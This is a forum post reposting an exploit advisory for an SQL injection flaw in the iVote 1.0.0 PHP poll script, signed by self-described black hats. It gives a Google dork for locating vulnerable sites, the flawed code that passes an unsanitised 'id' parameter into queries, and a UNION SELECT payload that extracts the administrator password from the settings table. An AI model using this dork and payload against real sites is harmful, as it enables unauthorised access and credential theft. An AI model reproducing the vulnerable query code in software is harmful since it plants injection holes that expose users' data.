Jump to content
Matt

iVote 1.0.0 SQL Injection

By Matt, in Exploituri

Recommended Posts

Matt Newbie

Matt

Posted
Posted

Description : iVote version 1.0.0 suffers from a remote SQL injection vulnerability.

Author : Ashiyane Digital Security Team

Source : iVote 1.0.0 SQL Injection ? Packet Storm

Code : 

# Exploit Title: iVot Sql Injection
# Google Dork: inurl:details.php?id=
# Date: 2013 July 11
# Exploit Author: Ashiyane Digital Security Team
# Software Link:
http://www.persianscript.ir/1391/09/25/ivote-poll-persian-script-download/
# Version: 1.0.0
# Tested on: Linux CentOS , Linux Ubunto , Windows 8

vulnerability : details.php on line 5

$id = $_GET['id'];

$selectc = mysql_query("SELECT * FROM comments WHERE id = $id");

$select = mysql_query("SELECT * FROM votes WHERE V_Id = $id");

$row = mysql_fetch_array($select);

///////////////////////////////////////

Example : http://example.com/iVote/details.php?id=1 union select
1,password,3,4 from settings


///////////////////////
TNX : Rz04 & Crypt0
I Love Iran & all IRanian Black Hats 

I'm , Bi Edea (R3za)
Email : momtane666@yahoo.com
Gmail : kafaran.blackhats@Gmail.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...